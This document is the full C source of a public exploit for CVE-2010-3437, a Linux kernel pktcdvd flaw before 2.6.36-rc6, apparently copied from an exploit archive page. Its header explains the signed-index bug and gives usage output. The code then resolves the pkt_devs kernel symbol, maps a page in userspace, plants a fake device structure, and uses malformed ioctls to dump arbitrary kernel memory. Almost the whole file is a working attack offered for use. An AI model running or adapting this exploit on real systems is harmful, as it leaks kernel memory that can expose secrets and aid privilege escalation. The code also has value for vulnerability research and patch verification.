扫码分享
验证:
体验盒子/*
* cve-2010-3437.c
*
* Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* https://bugzilla.redhat.com/show_bug.cgi?id=638085
*
* The PKT_CTRL_CMD_STATUS device ioctl retrieves a pointer to a
* pktcdvd_device from the global pkt_devs array.The index into this
* array is provided directly by the user and is a signed integer, so the
* comparison to ensure that it falls within the bounds of this array will
* fail when provided with a negative index.
*
* Usage:
*
* $ gcc cve-2010-3437.c -o cve-2010-3437
* $ ./cve-2010-3437
* usage: ./cve-2010-3437 <address> <length>
* $ ./cve-2010-3437 0xc0102290 64
* [+] searching for pkt_devs kernel symbol...
* [+] found pkt_devs at 0xc086fcc0
* [+] opening pktcdvd device...
* [+] calculated dereference address of 0x790070c0
* [+] mapping page at 0x79007000 for pktcdvd_device dereference...
* [+] setting up fake pktcdvd_device structure...
* [+] dumping kmem from 0xc0102290 to 0xc01022d0 via malformed ioctls...
* [+] dumping kmem to output...
*
* 55 89 e5 0f 1f 44 00 00 8b 48 3c 8b 50 04 8b ...
* 55 89 e5 57 56 53 0f 1f 44 00 00 89 d3 89 e2 ...
*
* Notes:
*
* Pass the desired kernel memory address and dump length as arguments.
*
* We can disclose 4 bytes of arbitrary kernel memory per ioctl call by
* specifying a large negative device index, causing the kernel to
* dereference to our fake pktcdvd_device structure in userspace and copy
* data to userspace from an attacker-controlled address.Since only 4
* bytes of kmem are disclosed per ioctl call, large dump sizes may take a
* few seconds.
*
* Tested on Ubuntu Lucid 10.04.32-bit only for now.
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/utsname.h>
#include <sys/mman.h>
#define DEV_INDEX -300000000
#define PAGE_SIZE 4096
#define PKT_CTRL_CMD_STATUS 2
struct pkt_ctrl_command {
uint32_t command;
int32_t dev_index;
uint32_t dev;
uint32_t pkt_dev;
uint32_t num_devices;
uint32_t padding;
};
#define PACKET_IOCTL_MAGIC ('X')
#define PACKET_CTRL_CMD _IOWR(PACKET_IOCTL_MAGIC, 1, struct pkt_ctrl_command)
struct block_device {
uint32_t bd_dev;
} bd;
struct pktcdvd_device {
struct block_device *bdev;
} pd;
#define MINORBITS 20
#define MKDEV(ma,mi) (((ma) << MINORBITS) | (mi))
uint32_t
new_decode_dev(uint32_t dev)
{
unsigned major = (dev & 0xfff00) >> 8;
unsigned minor = (dev & 0xff) | ((dev >> 12) & 0xfff00);
return MKDEV(major, minor);
}
const char hex_asc[] = "0123456789abcdef";
#define hex_asc_lo(x) hex_asc[((x) & 0x0f)]
#define hex_asc_hi(x) hex_asc[((x) & 0xf0) >> 4]
void
hex_dump_to_buffer(const void *buf, size_t len, int rowsize, int groupsize, char *linebuf, size_t linebuflen, int ascii)
{
const uint8_t *ptr = buf;
uint8_t ch;
int j, lx = 0;
int ascii_column;
if (rowsize != 16 && rowsize != 32)
rowsize = 16;
if (!len)
goto nil;
if (len > rowsize)
len = rowsize;
if ((len % groupsize) != 0)
groupsize = 1;
switch (groupsize) {
case 8: {
const uint64_t *ptr8 = buf;
int ngroups = len / groupsize;
for (j = 0; j < ngroups; j++)
lx += snprintf(linebuf + lx, linebuflen - lx,
"%16.16llx ", (unsigned long long)*(ptr8 + j));
ascii_column = 17 * ngroups + 2;
break;
}
case 4: {
const uint32_t *ptr4 = buf;
int ngroups = len / groupsize;
for (j = 0; j < ngroups; j++)
lx += snprintf(linebuf + lx, linebuflen - lx,
"%8.8x ", *(ptr4 + j));
ascii_column = 9 * ngroups + 2;
break;
}
case 2: {
const uint16_t *ptr2 = buf;
int ngroups = len / groupsize;
for (j = 0; j < ngroups; j++)
lx += snprintf(linebuf + lx, linebuflen - lx,
"%4.4x ", *(ptr2 + j));
ascii_column = 5 * ngroups + 2;
break;
}
default:
for (j = 0; (j < rowsize) && (j < len) && (lx + 4) < linebuflen;
j++) {
ch = ptr[j];
linebuf[lx++] = hex_asc_hi(ch);
linebuf[lx++] = hex_asc_lo(ch);
linebuf[lx++] = ' ';
}
ascii_column = 3 * rowsize + 2;
break;
}
if (!ascii)
goto nil;
while (lx < (linebuflen - 1) && lx < (ascii_column - 1))
linebuf[lx++] = ' ';
for (j = 0; (j < rowsize) && (j < len) && (lx + 2) < linebuflen; j++)
linebuf[lx++] = (isascii(ptr[j]) && isprint(ptr[j])) ? ptr[j]
: '.';
nil:
linebuf[lx++] = '\0';
}
void
print_hex_dump(int rowsize, int groupsize, const void *buf, size_t len, int ascii)
{
const uint8_t *ptr = buf;
int i, linelen, remaining = len;
unsigned char linebuf[200];
if (rowsize != 16 && rowsize != 32)
rowsize = 16;
for (i = 0; i < len; i += rowsize) {
linelen = ((remaining) < (rowsize) ? (remaining) : (rowsize));
remaining -= rowsize;
hex_dump_to_buffer(ptr + i, linelen, rowsize, groupsize,
linebuf, sizeof(linebuf), ascii);
printf("%s\n", linebuf);
}
}
unsigned long
get_kernel_symbol(char *name)
{
FILE *f;
unsigned long addr;
struct utsname ver;
char dummy, sname[512];
int ret, rep = 0, oldstyle = 0;
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
f = fopen("/proc/ksyms", "r");
if (f == NULL) {
goto fallback;
}
oldstyle = 1;
}
repeat:
ret = 0;
while(ret != EOF) {
if (!oldstyle) {
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
} else {
ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
if (ret == 2) {
char *p;
if (strstr(sname, "_O/") || strstr(sname, "_S.")) {
continue;
}
p = strrchr(sname, '_');
if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
p = p - 4;
while (p > (char *)sname && *(p - 1) == '_') {
p--;
}
*p = '\0';
}
}
}
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fclose(f);
return addr;
}
}
fclose(f);
if (rep) {
return 0;
}
fallback:
uname(&ver);
if (strncmp(ver.release, "2.6", 3)) {
oldstyle = 1;
}
sprintf(sname, "/boot/System.map-%s", ver.release);
f = fopen(sname, "r");
if (f == NULL) {
return 0;
}
rep = 1;
goto repeat;
}
void
usage(char **argv)
{
fprintf(stderr, "usage: %s <address> <length>\n", argv[0]);
exit(1);
}
int
main(int argc, char **argv)
{
int fd, ret, length;
void *mem, *dump, *ptr;
struct pkt_ctrl_command cmd;
unsigned long pkt_devs, map_addr, deref_addr;
unsigned long start_addr, end_addr, curr_addr;
if (argc < 3) {
usage(argv);
}
start_addr = strtoul(argv[1], NULL, 0);
length = strtoul(argv[2], NULL, 0);
end_addr = start_addr + length;
dump = malloc(length);
if (!dump) {
printf("[-] failed to allocate memory for kmem dump\n");
exit(1);
}
memset(dump, 0, length);
printf("[+] searching for pkt_devs kernel symbol...\n");
pkt_devs = get_kernel_symbol("pkt_devs");
if (!pkt_devs) {
printf("[-] could not find pkt_devs kernel symbol\n");
exit(1);
}
printf("[+] found pkt_devs at %p\n", (void *) pkt_devs);
printf("[+] opening pktcdvd device...\n");
fd = open("/dev/pktcdvd/control", O_RDWR);
if (fd < 0) {
printf("[-] open of pktcdvd device failed\n");
exit(1);
}
deref_addr = pkt_devs + (DEV_INDEX * sizeof(void *));
map_addr = deref_addr & ~(PAGE_SIZE-1);
printf("[+] calculated dereference address of %p\n", (void *) deref_addr);
printf("[+] mapping page at %p for pktcdvd_device dereference...\n", (void *) map_addr);
mem = mmap((void *) map_addr, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (mem == MAP_FAILED) {
printf("[-] mmap failed\n");
exit(1);
}
printf("[+] setting up fake pktcdvd_device structure...\n");
*(unsigned long *) deref_addr = (unsigned long) &pd;
printf("[+] dumping kmem from %p to %p via malformed ioctls...\n", (void *) start_addr, (void *) end_addr);
memset(&cmd, 0, sizeof(cmd));
cmd.command = PKT_CTRL_CMD_STATUS;
cmd.dev_index = DEV_INDEX;
ptr = dump;
curr_addr = start_addr;
while (curr_addr < end_addr) {
pd.bdev = (struct block_device *) curr_addr;
ret = ioctl(fd, PACKET_CTRL_CMD, &cmd);
if (ret < 0) {
printf("[-] ioctl of pktcdvd device failed\n");
exit(1);
}
*(uint32_t *) ptr = (uint32_t) new_decode_dev(cmd.dev);
curr_addr += sizeof(uint32_t);
ptr += sizeof(uint32_t);
}
printf("[+] dumping kmem to output...\n");
printf("\n");
print_hex_dump(32, 1, dump, length, 1);
printf("\n");
return 0;
}
体验盒子
